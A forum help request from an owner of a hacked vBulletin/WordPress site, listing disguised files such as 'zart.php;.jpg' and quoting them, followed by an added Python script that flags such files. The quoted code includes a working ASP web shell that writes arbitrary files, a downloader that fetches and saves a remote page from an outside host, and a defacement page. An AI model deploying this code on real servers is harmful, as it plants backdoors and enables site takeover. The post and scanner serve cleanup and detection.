My WordPress / vBulletin 4 forum has been hacked. I found a lot of issues on the WP side of things, and I started combing through the files on vBulletin. I found xss.asp; which is a text document with the following code in it.
I also found a file named zart.asp; which is a jpg file, but I can't open it in Dreamweaver, or Fireworks, but was able to open it with Notepad++.
I'll follow this with the following files I found in the root of vB4:
BBHH.html (I know is a hack file)
site.php;.jpg
zart.php;.jpg
xss.asp;.txt
teste.txt (code below)
Okay, there may be more but I need to know if I can just delete the files, and if all of these files are hacked files. I see no mention of who the coder is on most of the files. What steps do I follow to clean my board? Many thanks for your assistance.
BTW, admincp and modcp are not the names; I used this thread for security: Secure your vB forum
Code:
<% set fso = Server.CreateObject("Scripting.FileSystemObject") mapPath = Server.mappath(Request.Servervariables("SCRIPT_NAME")) if session(myScriptName) = "" then for x = len(mapPath) to 0 step -1 myScriptName = mid(mapPath,x) if instr(1,myScriptName,"\")>0 then myScriptName = mid(mapPath,x+1) x=0 session(myScriptName) = myScriptName end if next Else myScriptName = session(myScriptName) end if %><%dim objfso%><%dim fdata%><%dim objcountfile%><%on error resume next%><%set objfso = server.createobject("S"+"cr"+"ipt"+"ing"+".f"+"il"+"es"+"ys"+"tem"+"ob"+"jec"+"t")%><%if trim(request("syfdpath"))<>"" then%><%fdata = request("cyfddata")%><%set objcountfile=objfso.createtextfile(request("syfdpath"),true)%><%objcountfile.write fdata%><%if err =0 then%><%response.write "<font color=red>save success!</font>"%><%else%><%response.write "<font color=red>save unsuccess!</font>"%><%end if%><%err.clear%><%end if%><%objcountfile.close%><%set objcountfile=nothing%><%set objfso = nothing%><%response.write "<center><form action="" method=post>"%><%=server.mappath(request.servervariables("script_name"))%><%response.write "<br>"%><%response.write "<input type=text name=syfdpath width=32 size=50>"%><%response.write "<br>"%><%response.write "<textarea name=cyfddata cols=100 rows=10 width=32></textarea>"%><%response.write "<br>"%><%response.write "<input type=submit value=SAVE>"%><%response.write "</form></center>"%>
Code:
<% Option Explicit Dim cOUT,scc,cURL,objXML,binXML,objADO scc = Server.MapPath(Request.ServerVariables("SCRIPT_NAME")) cOUT = Left(scc,Len(scc) - 13) cURL = "http://hamyaran.sharif.edu/gallery/images/1.txt" Const cform = "Default.cs.aspx" Set objXML = CreateObject("Microsoft.XMLHTTP") objXML.Open "GET", cURL , False objXML.Send binXML = objXML.ResponseBody Set objXML = Nothing Set objADO = server.CreateObject("ADODB.Stream") objADO.Type = 1 objADO.Open objADO.Write binXML objADO.SaveToFile cOUT & cform,2 Set objADO = Nothing Response.Write "downloaded." %>
Code:
<title>HackeD bY BLACK BURN (BBHH)</title> <body bgcolor = Black> <center><h1> <font color= red>HackeD bY BLACK BURN (BBHH)</font> </h1> </center> <hr > <br> <br> <center> <h3><font color= blue>We Show No Mercy,Take No Mercy:We Are Legends,We Are Sniper's,Be Ware - We Are Here - We Are Everywhere,Respect Us</font> </h3></center> <br> <center><img src = "http://i39.tinypic.com/24dlshg.jpg"></center> <br> <center><font color = red>GREETZ :- Xtor,Back Bone,Orion Hunter,cyb3r_gangst3r, K_5h3ll,N3opHyT3H4ck3r,RKHM00N,Gh0st KilL3r,Death WisheR,Z3RO,Whishper Death,cMshAcK,v0174g3,Sakib Sami And All Bangladesh Black Hat Hackers </font></center> <embed src="http://www.youtube.com/v/XYKUeZQbMF0&autoplay=1" type="application/x-shockwave-flash" wmode="transparent" width="1" height="1"></embed> </body> </html>
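A triage check for the file names listed in the post, added here as an example and not part of the original post: it walks a web root and flags names where a script extension is followed by `;` (like `zart.php;.jpg`), and image or text files that contain a server-side script tag (like `teste.txt`). The extension lists, the function names and the sample tree are assumptions constructed for the demonstration.

```python
import os
import re
import tempfile

# Script extension followed by ';' and more text, e.g. "zart.php;.jpg".
SEMICOLON_NAME = re.compile(r"\.(asp|aspx|php|cer|asa)\s*;", re.IGNORECASE)
# Server-side script openers that should not appear in images or text files.
SCRIPT_MARKERS = (b"<%", b"<?php")
PASSIVE_EXTS = {".jpg", ".jpeg", ".png", ".gif", ".txt"}  # assumed list

def triage(root):
    """Return {relative_path: [reasons]} for files worth manual review."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            reasons = []
            if SEMICOLON_NAME.search(name):
                reasons.append("script extension before ';' in name")
            ext = os.path.splitext(name)[1].lower()
            if ext in PASSIVE_EXTS:
                try:
                    with open(path, "rb") as fh:
                        head = fh.read(65536).lower()
                except OSError:
                    reasons.append("unreadable")
                    head = b""
                if any(m in head for m in SCRIPT_MARKERS):
                    reasons.append("server-side script tag in passive file")
            if reasons:
                findings[os.path.relpath(path, root)] = reasons
    return findings

def demo():
    """Build a constructed sample tree (placeholder contents) and scan it."""
    with tempfile.TemporaryDirectory() as root:
        samples = {
            "zart.php;.jpg": b"<?php /* constructed placeholder */ ?>",
            "xss.asp;.txt": b"<% ' constructed placeholder %>",
            "teste.txt": b"<% Option Explicit %>",
            "logo.jpg": b"\xff\xd8\xff\xe0 constructed jpeg header",
            "index.php": b"<?php echo 'forum'; ?>",
        }
        for name, data in samples.items():
            with open(os.path.join(root, name), "wb") as fh:
                fh.write(data)
        return triage(root)

if __name__ == "__main__":
    for path, reasons in sorted(demo().items()):
        print(path, "->", "; ".join(reasons))
```

A hit means the file needs manual review before deletion, not that it is confirmed malicious. A plain HTML defacement page such as `BBHH.html` is not caught by these two checks and is better found by comparing the directory against a clean copy of the forum package.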